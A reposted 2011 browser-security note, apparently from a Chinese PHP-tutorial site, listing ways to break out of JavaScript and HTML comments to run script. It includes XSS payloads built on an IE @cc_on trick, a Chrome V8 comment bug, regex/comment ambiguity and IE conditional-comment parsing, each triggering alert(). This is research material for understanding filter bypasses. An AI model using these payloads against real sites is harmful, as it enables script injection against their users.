网站地图    收藏   

主页 > 后端 > 网站安全 >

Breaking javascript/html comments - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] Author:@Sogili这只是个简单的笔记.如果你也有更多的想法,欢迎提出.1.JavascriptIE:script/*@cc_on!alert(1)//*//script利用IE的条件编译机制突破, about @cc_on statment,一般用于做hack.Chrome:script......

Author:@Sogili

这只是个简单的笔记.如果你也有更多的想法,欢迎提出.

1.Javascript

IE:

<script>/*@cc_on!alert(1)//*/</script>利用IE的条件编译机制突破, about @cc_on statment,一般用于做hack.

Chrome:

<script>/*猪/alert(3)//*/</script>正如你所看到的,这是个由v8引擎解析注释时候做了个小hack造成的bug,也不知道为什么留到了现在.

Any:

<script>/ //alert(1)</script>这是个很有意思的tip,或许这样写你会更清楚:/regex//alert(1)

2.HTML

<img/<!--/src=x:x onerror=alert(2)//-->元素内不可嵌套元素造成.

<!--[if<img src=x:x onerror=alert(5)//]-->这是个ie解析条件注释的bug,在ie10中条件注释已被遗弃.衰仔在这也有描述.

Chrome,Firefox支持.

IE,Opera支持.

sleep,bye.

Published 08/14/2011

@0xsec

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论